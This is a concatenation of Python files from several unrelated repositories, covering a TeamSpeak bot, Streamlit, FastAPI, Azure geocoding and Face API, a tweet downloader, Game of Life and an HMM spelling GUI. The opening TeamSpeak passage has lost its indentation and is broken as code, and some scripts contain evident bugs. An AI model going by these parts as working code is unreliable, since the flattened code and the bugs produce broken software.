cgroups = list(filter(lambda g: g.get("name") in commander_group_names, self.ts3bot.ts_connection.ts3exec(lambda t: t.query("channelgrouplist").all())[0]))
if len(cgroups) < 1:
log.info("Could not find any group of %s to determine commanders by. Disabling this feature.", str(commander_group_names))
self.commander_groups = []
return
self.commander_groups = [c.get("cgid") for c in cgroups]
def execute(self):
if not self.commander_groups:
return # disabled if no groups were found
active_commanders = []
def retrieve_commanders(tsc):
command = tsc.query("channelgroupclientlist")
for cgid in self.commander_groups:
command.pipe(cgid = cgid)
return command.all()
acs, ts3qe = self.ts3bot.ts_connection.ts3exec(retrieve_commanders, signal_exception_handler)
        if ts3qe: # check for .resp, could be another exception type
if ts3qe.resp is not None:
if ts3qe.resp.error["id"] != "1281":
print(ts3qe.resp.error["id"])
print(type(ts3qe.resp.error["id"]))
print(ts3qe.resp.error["id"] == "1281")
# 1281 is "database empty result set", which is an expected error
# if not a single user currently wears a tag.
log.error("Error while trying to resolve active commanders: %s.", str(ts3qe))
else:
print(ts3qe)
print(ts3qe.resp)
print(ts3qe.resp.error["id"])
print(ts3qe.resp.error)
else:
active_commanders_entries = [(c, self.ts3bot.getUserDBEntry(self.ts3bot.getTsUniqueID(c.get("cldbid")))) for c in acs]
for ts_entry, db_entry in active_commanders_entries:
if db_entry is not None: # or else the user with the commander group was not registered and therefore not in the DB
u = User(self.ts3bot.ts_connection, ts_db_id = ts_entry.get("cldbid"))
if u.current_channel.channel_id == ts_entry.get("cid"):
# user could have the group in a channel but not be in there atm
ac = {}
ac["account_name"] = db_entry["account_name"]
ac["ts_cluid"] = db_entry["ts_db_id"]
ac["ts_display_name"], ex1 = self.ts3bot.ts_connection.ts3exec(lambda t: t.query("clientgetnamefromuid", cluid = db_entry["ts_db_id"]).first().get("name")) # no, there is probably no easier way to do this. I checked.
ac["ts_channel_name"], ex2 = self.ts3bot.ts_connection.ts3exec(lambda t: t.query("channelinfo", cid = ts_entry.get("cid")).first().get("channel_name"))
if ex1 or ex2:
log.warning("Could not determine information for commanding user with ID %s: '%s'. Skipping." % (str(ts_entry), ", ".join([str(e) for e in [ex1,ex2] if e is not None])))
else:
active_commanders.append(ac)
# print({"commanders": active_commanders})
self.ipcserver.broadcast({"commanders": active_commanders})
#######################################
```
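The User class above resolves unique_id, ts_db_id and client_id lazily and caches every value it learns as a side effect of other queries. A minimal standalone sketch of that caching pattern, with a hypothetical lookup callable standing in for the TeamSpeak queries:
```python
class LazyUser:
    """Resolve identifiers only on first access and cache the result."""

    def __init__(self, unique_id=None, db_id=None, lookup_db_id=None):
        self._unique_id = unique_id
        self._db_id = db_id
        # hypothetical callable mapping a unique id to a database id (one remote call)
        self._lookup_db_id = lookup_db_id

    @property
    def db_id(self):
        if self._db_id is None:
            if self._unique_id is None:
                raise ValueError("at least one identifier must be set")
            # resolved once, cached for every later access
            self._db_id = self._lookup_db_id(self._unique_id)
        return self._db_id


calls = []
user = LazyUser(unique_id="abc=", lookup_db_id=lambda uid: calls.append(uid) or 42)
print(user.db_id, user.db_id, len(calls))  # 42 42 1 -> the lookup ran only once
```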
|
{
"source": "JeyDi/docker-starter-kit",
"score": 3
}
|
#### File: cookiecutter-example/{{cookiecutter.project_slug}}/lblocker.py
```python
import re
from werkzeug import serving
def disable_endpoint_logs():
"""Disable logs for requests to specific endpoints."""
# Endpoint logging to disable
disabled_endpoints = ("/", "/monitoring/analysis/status")
parent_log_request = serving.WSGIRequestHandler.log_request
def log_request(self, *args, **kwargs):
if not any(re.match(f"{de}$", self.path) for de in disabled_endpoints):
parent_log_request(self, *args, **kwargs)
serving.WSGIRequestHandler.log_request = log_request
# remember to call the function at the end of logging.py file
disable_endpoint_logs()
```
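A hedged usage sketch for the patch above: importing the module applies the monkey patch (disable_endpoint_logs() runs at import time), so the werkzeug development server stops logging the listed endpoints. The Flask app and module name below are assumptions for illustration:
```python
from flask import Flask

import lblocker  # hypothetical module name; importing it patches WSGIRequestHandler.log_request

app = Flask(__name__)


@app.route("/")
def health():
    # requests to "/" are still served, but no longer appear in the access log
    return "ok"


if __name__ == "__main__":
    # the werkzeug dev server used by app.run() picks up the patched handler
    app.run(port=5000)
```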
#### File: src/pages/page2.py
```python
import streamlit as st
from ..utils import Page
class Page2(Page):
def __init__(self, state):
self.state = state
def write(self):
st.title("Page 2")
st.write(self.state.client_config["slider_value"])
```
#### File: streamlit-stream/producer/main.py
```python
from fastapi import FastAPI, WebSocket
from random import choice, randint
import asyncio
app = FastAPI()
CHANNELS = ["A", "B", "C"]
@app.websocket("/sample")
async def websocket_endpoint(websocket: WebSocket):
await websocket.accept()
while True:
await websocket.send_json({
"channel": choice(CHANNELS),
"data": randint(1, 10)
}
)
await asyncio.sleep(0.5)
```
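A minimal client sketch for the /sample endpoint above, assuming the producer is served locally with uvicorn on port 8000 (host, port and message count are assumptions); it uses the third-party websockets package:
```python
import asyncio
import json

import websockets  # pip install websockets


async def consume(url: str = "ws://localhost:8000/sample") -> None:
    async with websockets.connect(url) as ws:
        for _ in range(5):  # read a handful of messages, then stop
            message = json.loads(await ws.recv())
            print(message["channel"], message["data"])


if __name__ == "__main__":
    asyncio.run(consume())
```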
#### File: src/common/charts.py
```python
import altair as alt
import pandas as pd
from .constants import MatColors
def get_candlestick(data_dict, sampling_freq, **kwargs):
source = pd.DataFrame(list(data_dict))
source.ts = source.ts.astype("datetime64[ms]")
source = source.set_index("ts")
source = source.price.resample(sampling_freq).ohlc().reset_index().bfill()
open_close_color = alt.condition(
"datum.open <= datum.close",
alt.value(MatColors.GREEN_700.value),
alt.value(MatColors.RED_700.value),
)
base_chart = alt.Chart(source).encode(
alt.X("ts:T", axis=alt.Axis(labelAngle=-45,)), color=open_close_color
)
rule = base_chart.mark_rule().encode(
alt.Y("low:Q", scale=alt.Scale(zero=False), title="Price"), alt.Y2("high:Q")
)
bar = base_chart.mark_bar().encode(alt.Y("open:Q"), alt.Y2("close:Q"))
return rule + bar
def get_line(data_dict, sampling_freq, **kwargs):
source = pd.DataFrame(list(data_dict))
source.ts = source.ts.astype("datetime64[ms]")
source = source.set_index("ts").resample(sampling_freq).mean().reset_index().bfill()
base_chart = (
alt.Chart(source)
.mark_area(
line={"color": "darkgreen"},
color=alt.Gradient(
gradient="linear",
stops=[
alt.GradientStop(color="white", offset=0),
alt.GradientStop(color="darkgreen", offset=1),
],
x1=1,
x2=1,
y1=1,
y2=0,
),
)
.encode(
x=alt.X("ts:T"),
y=alt.Y(
"price:Q",
scale=alt.Scale(domain=[source.price.min(), source.price.max()]),
),
)
)
return base_chart
def get_bars(data_dict, sampling_freq, **kwargs):
source = pd.DataFrame(list(data_dict))
source.ts = source.ts.astype("datetime64[ms]")
source = source.set_index("ts").resample(sampling_freq).mean().reset_index().bfill()
base_chart = (
alt.Chart(source).mark_bar().encode(x=alt.X("ts:T"), y=alt.Y("price:Q"))
)
return base_chart
CHARTS = {"candlestick": get_candlestick, "line": get_line, "bar": get_bars}
```
|
{
"source": "JeyDi/E-Grid",
"score": 3
}
|
#### File: E-Grid/maps/geocoding.py
```python
import json
import urllib
import requests
import yaml
def geolocalize(configs):
url = "https://atlas.microsoft.com/search/address/json?"
params = {'subscription-key': configs['subscription_key'], "api-version": "1.0"}
with open("poi/result_p&t.json", "rt", encoding="utf8") as inf, \
open("geo_addresses.json", "wt", encoding="utf8") as outf:
for line in inf:
obj = json.loads(line)
address = obj['address']
cap = obj['cap']
region = obj['region']
state = obj['state']
try:
params['query'] = ", ".join([address, cap, region, state])
encoded = urllib.parse.urlencode(params)
request_url = url + encoded
response = requests.get(request_url)
results = response.json()['results']
# response['results'][0]['address']['countrySecondarySubdivision']
latitude = results[0]['position']['lat']
longitude = results[0]['position']['lon']
obj['latitude'] = latitude
obj['longitude'] = longitude
obj['type'] = "Pharmacy" if "farmaci" in obj['url'].lower() else "Textile"
str_obj = json.dumps(obj, ensure_ascii=False)
outf.write(str_obj + "\n")
except Exception as message:
print(f"Impossibile to get information because: {message}")
if __name__ == '__main__':
with open('azuremaps_config.yml', encoding="utf8") as file:
configs = yaml.load(file, Loader=yaml.FullLoader)
geolocalize(configs)
```
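For reference, a stripped-down sketch of the same Azure Maps request for a single free-form address, reusing the URL and parameters already used in geolocalize (the subscription key is a placeholder):
```python
import urllib.parse

import requests


def geocode_one(address: str, subscription_key: str):
    """Return (lat, lon) for a single address, or None if nothing was found."""
    url = "https://atlas.microsoft.com/search/address/json?"
    params = {
        "subscription-key": subscription_key,
        "api-version": "1.0",
        "query": address,
    }
    response = requests.get(url + urllib.parse.urlencode(params))
    results = response.json().get("results", [])
    if not results:
        return None
    position = results[0]["position"]
    return position["lat"], position["lon"]


# print(geocode_one("Piazza del Duomo, Milano, Italy", "<your-subscription-key>"))
```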
|
{
"source": "JeyDi/GameOfLife",
"score": 3
}
|
#### File: JeyDi/GameOfLife/config.py
```python
import os
import logging
from logging.handlers import RotatingFileHandler
# Set the logs
VERBOSITY = os.getenv(
"VERBOSITY", "debug"
) # info as default, #debug for local dev
LOG_PATH = os.getenv("LOG_PATH", "./logs")
# Define the logs
# Set verbosity
def configure_logging(verbosity=VERBOSITY, log_path=LOG_PATH):
log_level = logging.getLevelName(verbosity.upper())
if isinstance(log_level, int):
logging.basicConfig(
level=log_level,
format="[%(levelname)s] %(asctime)s | %(message)s | in function: %(funcName)s",
handlers=[
RotatingFileHandler(
os.path.join(log_path, "info.log"),
maxBytes=10000,
backupCount=10,
),
logging.StreamHandler(),
],
)
result = True
else:
result = False
raise NotImplementedError(
f"Logging level {VERBOSITY.upper()} does not exist!"
)
return result
ROWS = 40
COLUMNS = 40
MAX_PROB = 2
MAX_TICK = 60
```
#### File: JeyDi/GameOfLife/main.py
```python
import time
import typer
import logging
from config import configure_logging, ROWS, COLUMNS, MAX_PROB
from src.board import GameBoard
from src.rules import game_status
def main(
user: int = typer.Option(1, min=0, max=1),
rows: int = typer.Option(40, min=10),
columns: int = typer.Option(40, min=10),
max_prob: int = typer.Option(2, min=2, max=9),
max_tick: int = typer.Option(60, min=-1),
sleep: int = typer.Option(1, min=1),
verbosity: str = typer.Option("info"),
):
# Configure the logging
configure_logging(verbosity, "./logs")
# Use typer
if user == "1":
# Ask for the user value input
rows = int(typer.prompt("Insert the number of rows"))
columns = int(typer.prompt("Insert the number of columns"))
max_prob = int(
typer.prompt(
"Insert the probability of spawning a new living cell"
)
)
max_tick = int(
typer.prompt(
"Insert the number of iterations you want to observe (-1 for endless)"
)
)
launch = typer.confirm("Do you want to launch the simulation?")
if not launch:
message = typer.style("Ok! Bye...", fg=typer.colors.RED, bold=True)
typer.echo(message)
raise typer.Abort()
message = typer.style("Launching...", fg=typer.colors.GREEN, bold=True)
typer.echo(message)
# Define the simulation default parameters
if rows == 0:
rows = ROWS
if columns == 0:
columns = COLUMNS
if max_prob == 0:
max_prob = MAX_PROB
tick = 0
logging.info("Launching the game")
logging.debug(f"Rows: {rows}")
logging.debug(f"Columns: {columns}")
logging.debug(f"Max_prob: {max_prob}")
logging.debug(f"Max Ticks: {max_tick}")
logging.debug(f"Verbosity: {verbosity}")
logging.debug(f"Max Ticks: {sleep}")
logging.debug(f"Alive probability: {1/(max_prob+1)}")
# create a board:
game_board = GameBoard(rows, columns, max_prob)
# run the first iteration of the board:
game_board.print_board(tick)
# Update the game status for every tick
while tick <= max_tick:
logging.debug(f"Tick: {tick}")
game_status(game_board, tick)
time.sleep(sleep)
tick += 1
game_board.print_board(tick)
if __name__ == "__main__":
typer.run(main)
```
#### File: GameOfLife/src/board.py
```python
import logging
from random import randint
from src.status import Cell
class GameBoard:
def __init__(self, rows: int, columns: int, max_prob=2):
self._rows = rows
self._columns = columns
# Define the grid
self._grid = [
[Cell() for c in range(self._columns)] for r in range(self._rows)
]
logging.debug(
f"Board generated with: {rows} rows, and {columns} columns"
)
# Build the board
self._build_board(max_prob)
logging.info("Initial board generated")
def _build_board(self, max_prob: int):
logging.debug("Building the board")
for r in self._grid:
for c in r:
# set the probability to spawn a living cell
probability = randint(0, max_prob)
if probability == 1:
c.set_alive()
def print_board(self, tick: int):
logging.info("\n\n\n\n")
logging.info(f"Board status tick: {tick}")
for r in self._grid:
for c in r:
print(f"{c.print_status()}", end="")
print()
```
|
{
"source": "JeyDi/IRPersonalNews",
"score": 3
}
|
#### File: PythonApps/Tweets/main.py
```python
from utilities.settings import downloadWithUsername, downloadWithQuerySearch, mergeFiles
# Documentation
# https://github.com/Jefferson-Henrique/GetOldTweets-python
def main():
print("-- Custom Tweet Downloader --")
# Keywords are: Politics, Science, Sport, Lifestyle, Tech
# keywords = ["politics","science","sport","lifesyle","tech"]
#
# for k in keywords:
# print(f"Downloading tweets for keyword: {k}")
# Politics
downloadWithQuerySearch("politics", username="BBCPolitics", collection_name="politics_1", max_tweets=3000)
downloadWithQuerySearch("politics", username="CNNPolitics", collection_name='politics_2', max_tweets=3000)
# Tech
downloadWithQuerySearch("tech", username="verge", collection_name='tech_1', max_tweets=3000)
downloadWithQuerySearch("tech", username="WiredUk", collection_name='tech_2', max_tweets=3000)
# Sport
downloadWithQuerySearch("sport", username="BBCSport", collection_name='sport_1', max_tweets=3000)
downloadWithQuerySearch("sport", username="Eurosport", collection_name='sport_2', max_tweets=3000)
# Lifestyle
downloadWithQuerySearch("lifestyle", username="voguemagazine", collection_name='lifestyle_1', max_tweets=3000)
downloadWithQuerySearch("lifestyle", username="IndyLife", collection_name='lifestyle_2', max_tweets=3000)
# Science
downloadWithQuerySearch("science", username="sciam", collection_name='science_1', max_tweets=3000)
downloadWithQuerySearch("science", username="sciencemagazine", collection_name='science_2', max_tweets=3000)
# Merge the result into a single file
result = mergeFiles()
return True
if __name__ == '__main__':
#result = main()
# Merge the result into a single file
result = mergeFiles()
print(result)
```
#### File: Tweets/utilities/settings.py
```python
import GetOldTweets3 as got
import pandas as pd
import os
import glob
from tqdm import tqdm
def mergeFiles(extension="csv", path=None):
"""
Merge files from a specific folder in a specific format
:param extension: format of the file (for example: csv)
:param path: custom path where you want to save the csv
:return:
"""
base_path = os.path.abspath('')
if path is not None:
os.chdir(path)
else:
from_files = os.path.join(base_path, "TweetsDownloaded")
try:
file_name = os.path.join(base_path, "combined_file" + '.' + extension)
os.chdir(from_files)
all_filenames = [i for i in glob.glob('*.{}'.format(extension))]
# combine all files in the list
combined_csv = pd.concat([pd.read_csv(f, sep=";") for f in all_filenames])
        # Parse the file and remove special chars (to avoid errors in Lucene indexes)
colnames = combined_csv.columns
combined_csv[colnames] = combined_csv[colnames].replace({';': ''}, regex=True)
# export to csv
combined_csv.to_csv(file_name, index=False, sep=";", encoding='utf-8-sig')
print(f"Files combined into: {file_name}")
return True
except Exception as message:
print(f"Impossible to concat the file into: {from_files} because: {message}")
return False
def writeTweetDisk(tweet_collection, collection_name, folder=None, path=None):
"""
Write a tweet to disk
:param tweet_collection: object containing tweets
:param collection_name: name of the collection
:param folder: folder you want to save the tweets
:param path: optional pat if you want to export tweets outside the main folder
:return: boolean (True, False)
"""
# Create the tweets collection
tweets = pd.DataFrame()
permalink_list = []
username_list = []
text_list = []
date_list = []
retweets_list = []
favorite_list = []
mentions_list = []
hashtag_list = []
geo_list = []
# Obtain data from the tweet_collection object
tweet_len = tweet_collection.__len__()
for t in tqdm(range(tweet_len)):
permalink_list.append(tweet_collection[t].permalink)
username_list.append(tweet_collection[t].username)
text_list.append(tweet_collection[t].text)
date_list.append(tweet_collection[t].date)
retweets_list.append(tweet_collection[t].retweets)
favorite_list.append(tweet_collection[t].favorites)
mentions_list.append(tweet_collection[t].mentions)
hashtag_list.append(tweet_collection[t].hashtags)
geo_list.append(tweet_collection[t].geo)
# Populate the dictionary for the export
tweets["permalink"] = permalink_list
tweets["username"] = username_list
tweets["text"] = text_list
tweets["date"] = date_list
tweets["retweet"] = retweets_list
tweets["favorite"] = favorite_list
tweets["mentions"] = mentions_list
tweets["hashtag"] = hashtag_list
tweets["geo"] = geo_list
tweets.index.name = "id"
# Parse the file and remove special chars
colnames = tweets.columns
tweets[colnames] = tweets[colnames].replace({';': ''}, regex=True)
# Write to disk
# Set the path for the file
base_path = os.path.abspath('')
if path is not None:
file_path = path
else:
file_path = base_path
file_name = collection_name + '.csv'
if folder is not None:
export_path = os.path.join(file_path, folder, file_name)
else:
export_path = os.path.join(file_path, file_name)
try:
tweets.to_csv(export_path, sep=";")
print(f"Collection of tweet: {collection_name} exported successfully to: {export_path}")
return True
except Exception as message:
print(f"Impossible to generate the csv to {export_path} because: {message}")
return False
def printTweet(description, tweets):
"""
Print the tweet you have downloaded
:param description: custom user description of the tweet
:param tweets: collection of tweets you want to view
:return: nothing
"""
print(description)
tweet_len = tweets.__len__()
for t in range(tweet_len):
print("Username: %s" % tweets[t].username)
print("Retweets: %d" % tweets[t].retweets)
print("Text: %s" % tweets[t].text)
print("Mentions: %s" % tweets[t].mentions)
print("Hashtags: %s\n" % tweets[t].hashtags)
def downloadWithUsername(username, since=None, until=None, collection_name=None, max_tweets=1000, print=False):
"""
# Mode 1 - Get tweets by username
:param collection_name: name of the tweet collection
:param until: initial date for the research
:param since: final date for the research
:param username: username for the research
:param max_tweets: maximal number of tweets
:return:
"""
if since is None or until is None:
tweetCriteria = got.manager.TweetCriteria().setUsername(username).setMaxTweets(max_tweets)
tweet = got.manager.TweetManager.getTweets(tweetCriteria)
# Research since and until a date
else:
tweetCriteria = got.manager.TweetCriteria().setUsername(username).setSince(since).setUntil(
until).setMaxTweets(max_tweets)
tweet = got.manager.TweetManager.getTweets(tweetCriteria)
if print:
# Print results
printTweet(f"Tweet from {username}", tweet)
# Write the tweet to disk
if collection_name is None:
writeTweetDisk(tweet, username, "TweetsDownloaded")
else:
writeTweetDisk(tweet, collection_name, "TweetsDownloaded")
return True
def downloadWithQuerySearch(query, username=None, since='2015-01-01', until='2020-02-02', collection_name=None,
max_tweets=1000, print=False):
"""
Download tweets based on a specific query and optionally a date
:param query: the query you want to use for the research
:param since: start date for the research
:param until: end date for the research
:param collection_name: name of the collection you want to export
:param max_tweets: max number of tweets you want to download
:return:
"""
# Example 2 - Get tweets by query search
if username is None:
tweetCriteria = got.manager.TweetCriteria().setQuerySearch(query).setSince(since).setUntil(
until).setMaxTweets(max_tweets)
else:
tweetCriteria = got.manager.TweetCriteria().setQuerySearch(query).setUsername(username).setSince(
since).setUntil(
until).setMaxTweets(max_tweets)
tweet = got.manager.TweetManager.getTweets(tweetCriteria)
if print:
# Print results
printTweet(f"Tweet with query: {query} since: {since}, until: {until}", tweet)
# Write the tweet to disk
if collection_name is None:
writeTweetDisk(tweet, query, "TweetsDownloaded")
else:
writeTweetDisk(tweet, collection_name, "TweetsDownloaded")
return True
```
|
{
"source": "JeyDi/MicrosoftFaceRecognition",
"score": 3
}
|
#### File: App/functions/camera.py
```python
import numpy as np
import cv2
from functions.faceapi import detect
def cameraCapture(auth_client, video_capture=0):
"""
Camera Stream with Open CV 2 on Laptop
"""
cap = cv2.VideoCapture(video_capture)
#set the width and height, and UNSUCCESSFULLY set the exposure time
cap.set(3,1080)
cap.set(4,1024)
cap.set(15, 0.1)
while (cap.isOpened()):
        video_frame_captured, video_frame = cap.read()
        # Process the frame only if the capture actually succeeded
        if video_frame_captured:
            gray_video_frame = cv2.cvtColor(video_frame, cv2.COLOR_BGR2GRAY)
            gray_video_frame = cv2.equalizeHist(gray_video_frame)
            # Detect the input
            d = detect(auth_client, video_frame)
            print(d)
            # Show the frame
            cv2.imshow("input", video_frame)
key = cv2.waitKey(10)
if key == 27:
break
cv2.destroyAllWindows()
cv2.VideoCapture(0).release()
```
#### File: App/functions/faceapi.py
```python
import asyncio, io, glob, os, sys, time, uuid, requests
from urllib.parse import urlparse
from io import BytesIO
import sys
import datetime
import cv2
from PIL import Image, ImageDraw
from azure.cognitiveservices.vision.face import FaceClient
from msrest.authentication import CognitiveServicesCredentials
from azure.cognitiveservices.vision.face.models import TrainingStatusType, Person, SnapshotObjectType, OperationStatusType, APIErrorException
def auth_client(key=None,endpoint=None):
"""Authenticate the client"""
if(key is None):
print("Cognitive Service Key not found, modify the config.yml file")
sys.exit("Impossibile to use the program without correct configuration")
if(endpoint is None):
print("Cognitive Service Endpoint not found, modify the config.yml file")
sys.exit("Impossibile to use the program without correct configuration")
# Create an authenticated FaceClient
try:
face_client = FaceClient(endpoint, CognitiveServicesCredentials(key))
    except Exception as message:
        print(f"Impossible to authenticate to the service, please fix or retry: {message}")
        return None
    return face_client
def detect(face_client,video_frame_buffer):
"""Detect info by an image from the camera"""
#img = cv2.imencode('.jpg', image)[1].tostring()
video_frame_stream = BytesIO(video_frame_buffer.tobytes())
try:
detected = face_client.face.detect_with_stream(video_frame_stream)
image_recognized = detected.json()
image_caption = image_recognized["description"]["captions"][0]["text"].capitalize()
        time_now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
result = time_now + ": " + image_caption
except APIErrorException as api_error:
print(api_error.message)
result = "Error"
return result
```
|
{
"source": "JeyDi/Mispelling",
"score": 3
}
|
#### File: code/tweets_download/tweets_cleaner.py
```python
import csv
import re
import os
import sys
import string
import nltk
from nltk.tokenize import word_tokenize
from configparser import ConfigParser
#Some usefull regexp
MENTIONS = re.compile(r'@[^\s]*')
URL = re.compile(r'htt[^\s]*')
SYMBOLS = re.compile(r'[^A-Za-z ]')
RT = re.compile(r'RT ')
SPACE = re.compile(r'\s+')
pathname = os.path.dirname(sys.argv[0])
config = ConfigParser()
config.read( pathname + '/../config.ini')
#result folder with the downloaded tweets
input_folder = config['twitter']['twitter_raw_tweets_folder']
output_folder = config['twitter']['twitter_cleaned_tweets_folder']
#Load the file and launch the preprocessing
def loadFile(inputfile):
text = ""
try:
file = open(inputfile, 'rt',encoding='UTF-8')
text = file.read()
file.close()
except FileNotFoundError:
print("File not found, please insert a valid one")
return(text)
#TODO: need to implement a csv and a txt outfile
def writeFile(outfile,text,file_type):
print("Final file generated")
#Output the file to csv
if(file_type == "csv"):
outfile = outfile + ".csv"
with open(outfile, "wt", encoding="utf8", newline="") as out_file:
writer = csv.writer(out_file, delimiter="\t")
for tweet_id in text:
writer.writerow([tweet_id, text[tweet_id]])
#Output the file to txt
elif(file_type == "txt"):
outfile = outfile + ".txt"
with open(outfile, 'a', encoding='utf8') as text_file:
text_file.write(text + "\n")
#error if the extension is not valid
else:
print("No file extension valid")
print("File successfully writed")
#Standard preprocessing with regexp
def cleanTweets(text):
#Text preprocessing using the REGEXP
text = MENTIONS.sub(' ', text) # Mentions
text = URL.sub(' ', text) # URLs
text = SYMBOLS.sub(' ', text) # Symbols
text = RT.sub(' ', text) # RT
text = SPACE.sub(' ', text)
final_text = text.strip() # spaces at head or tail
return(final_text)
#Another way to do the preprocessing using nltk and some others library
def cleanTweetsNLTK(text):
#Tokenize the words
tokens = word_tokenize(text)
# convert to lower case
tokens = [w.lower() for w in tokens]
# remove punctuation from each word
table = str.maketrans('', '', string.punctuation)
stripped = [w.translate(table) for w in tokens]
# remove remaining tokens that are not alphabetic
words = [word for word in stripped if word.isalpha()]
return(words)
def preprocessing(profile):
print("Start preprocessing")
input_file = os.path.join(input_folder, "raw_%s.txt" % profile)
text = loadFile(input_file)
#call the text preprocessing
result_text = cleanTweets(text)
#write the outfile
outfile = os.path.join(output_folder, "clean_%s" % profile)
file_type = "txt"
writeFile(outfile,result_text,file_type)
print("Finish preprocessing tweets")
```
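A small standalone demonstration of the regex chain used by cleanTweets above; the patterns are copied from the module so the snippet runs without the config.ini the script reads at import time, and the sample tweet is made up:
```python
import re

MENTIONS = re.compile(r'@[^\s]*')
URL = re.compile(r'htt[^\s]*')
SYMBOLS = re.compile(r'[^A-Za-z ]')
RT = re.compile(r'RT ')
SPACE = re.compile(r'\s+')


def clean(text):
    # same order as cleanTweets: mentions, URLs, symbols, retweet marker, whitespace
    for pattern in (MENTIONS, URL, SYMBOLS, RT, SPACE):
        text = pattern.sub(' ', text)
    return text.strip()


raw = "RT @user: Check this out!!! https://t.co/abc #news"
print(clean(raw))  # -> "Check this out news"
```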
#### File: Mispelling/temp/hmm_hand.py
```python
import numpy as np
from math import log
from collections import Counter
class HMMModel(object):
def viterbi(self, sequence, states, initial_frequencies, state_matrix, emission_matrix):
'''
        Hand-written Viterbi algorithm.
        Task: generate the most probable sequence of hidden states.
        Input: reduced model parameters and a sequence of observations.
'''
k = len(states)
t = len(sequence)
T1 = np.zeros((k,t))
T1[:,0] = initial_frequencies*emission_matrix[:,0]
T2 = np.zeros((k,t))
for i in range(1,t):
for j in range(k):
temp = [T1[x,i-1]*state_matrix[x,j] for x in range(k)]
T1[j,i] = emission_matrix[j,i]*max(temp)
T2[j,i] = temp.index(max(temp))
Z = np.zeros(t)
X = [""]*t
Z[t-1] = list(T1[:,t-1]).index(max(T1[:,t-1]))
X[t-1] = states[int(Z[t-1])]
for i in range(t-1,0,-1):
Z[i-1] = T2[int(Z[i]),i]
X[i-1] = states[int(Z[i-1])]
return (X, T1, T2)
```
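A hedged usage sketch for the hand-written Viterbi above. Note that emission_matrix is indexed by (state, time step), so the emission probabilities must already be evaluated against the observed sequence; the two-state toy model below is an assumption for illustration, not part of the original project:
```python
import numpy as np

# toy model: two hidden states, three possible observation symbols
states = ["Rainy", "Sunny"]
symbols = ["walk", "shop", "clean"]
sequence = ["walk", "clean", "shop"]

initial = np.array([0.6, 0.4])
transition = np.array([[0.7, 0.3],
                       [0.4, 0.6]])
# P(symbol | state), one row per state, one column per symbol
emission_by_symbol = np.array([[0.1, 0.4, 0.5],
                               [0.6, 0.3, 0.1]])

# the method expects emission probabilities per (state, time step)
obs_idx = [symbols.index(o) for o in sequence]
emission_matrix = emission_by_symbol[:, obs_idx]  # shape (2, 3)

path, T1, T2 = HMMModel().viterbi(sequence, states, initial, transition, emission_matrix)
print(path)  # -> ['Sunny', 'Rainy', 'Rainy'] for this toy model
```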
#### File: Mispelling/temp/mockup.py
```python
import os
import sys
import model_run_gui
from PyQt5 import QtCore, QtGui, QtWidgets
#from QtWidgets import QFileDialog
from PyQt5 import uic
#from PyQt5.QtWidgets import QApplication
# Path to this file
abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)
import sys
class SecondWindow(QtWidgets.QDialog):
def __init__(self):
QtWidgets.QWidget.__init__(self)
uic.loadUi("DictSelection.ui", self)
self.checkBox_MercedesAMG.setChecked(MyWindow.use_MercedesAMG)
self.checkBox_rogerfederer.setChecked(MyWindow.use_rogerfederer)
self.checkBox_realDonaldTrump.setChecked(MyWindow.use_realDonaldTrump)
self.checkBox_Forbes.setChecked(MyWindow.use_Forbes)
self.show()
def setMercedesAMG(self):
MyWindow.use_MercedesAMG = self.checkBox_MercedesAMG.isChecked()
print("setMercedesAMG = {}".format(MyWindow.use_MercedesAMG))
pass
def setrogerfederer(self):
MyWindow.use_rogerfederer = self.checkBox_rogerfederer.isChecked()
print("setsetrogerfederer = {}".format(MyWindow.use_rogerfederer))
pass
def setrealDonaldTrump(self):
MyWindow.use_realDonaldTrump = self.checkBox_realDonaldTrump.isChecked()
print("setrealDonaldTrump = {}".format(MyWindow.use_realDonaldTrump))
pass
def setForbes(self):
MyWindow.use_Forbes = self.checkBox_Forbes.isChecked()
print("setForbes = {}".format(MyWindow.use_Forbes))
pass
class MyWindow(QtWidgets.QMainWindow):
liveCorrection = False
use_MercedesAMG = True
use_rogerfederer = True
use_realDonaldTrump = True
use_Forbes = True
@staticmethod
def getDictList():
input_dicts = []
# Choose the dicts to append as input
if MyWindow.use_MercedesAMG:
input_dicts.append('clean_MercedesAMG')
print('clean_MercedesAMG')
if MyWindow.use_rogerfederer:
input_dicts.append('clean_rogerfederer')
print('clean_rogerfederer')
if MyWindow.use_realDonaldTrump:
input_dicts.append('clean_realDonaldTrump')
print('clean_realDonaldTrump')
if MyWindow.use_Forbes:
input_dicts.append('clean_Forbes')
print('clean_Forbes')
print(input_dicts)
return input_dicts
def __init__(self):
QtWidgets.QWidget.__init__(self)
uic.loadUi("gui.ui", self)
self.show()
def input_word(self):
if self.liveCorrection:
stringIn = self.input.toPlainText()
if stringIn:
if not model_run_gui.existsModel(self.getDictList()):
self.label_ModelGeneration.setText("Generating Model ...")
QtWidgets.QMessageBox.about(self, "Info", "Model doesn't exists in memory, additional computation time is required")
self.label_ModelGeneration.setText("Model generated successfully!")
result = model_run_gui.tryViterbi(stringIn,self.getDictList())
self.output.setText(result)
else:
self.output.setText("")
pass
def push_correction(self):
if not self.liveCorrection:
print(self.input.toPlainText())
stringIn = self.input.toPlainText()
if stringIn:
if not model_run_gui.existsModel(self.getDictList()):
self.label_ModelGeneration.setText("Generating Model ...")
QtWidgets.QMessageBox.about(self, "Info", "Model doesn't exists in memory, additional computation time is required")
self.label_ModelGeneration.setText("Model generated successfully!")
result = model_run_gui.tryViterbi(stringIn,self.getDictList())
self.output.setText(result)
else:
self.output.setText("")
pass
def predicted_word(self):
pass
def setLiveCorrection(self):
print(self.checkBoxLiveCorrection.isChecked())
self.liveCorrection = self.checkBoxLiveCorrection.isChecked()
pass
def getFile(self):
options = QtWidgets.QFileDialog.Options()
options |= QtWidgets.QFileDialog.DontUseNativeDialog
# fileName, _ = QtWidgets.QFileDialog.getOpenFileName(self,"QtWidgets.QFileDialog.getOpenFileName()", "","All Files (*);;Python Files (*.py)", options=options)
fileName, _ = QtWidgets.QFileDialog.getOpenFileName(self,"QtWidgets.QFileDialog.getOpenFileName()", "","Text files (*.txt)", options=options)
if fileName:
print(fileName)
f = open(fileName, 'r', encoding='UTF-8')
with f:
data = f.read()
self.input.setText(data)
def openDialog(self):
print("proova")
self.ui = SecondWindow()
# self.window.show()
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
window = MyWindow()
window.show()
sys.exit(app.exec_())
```
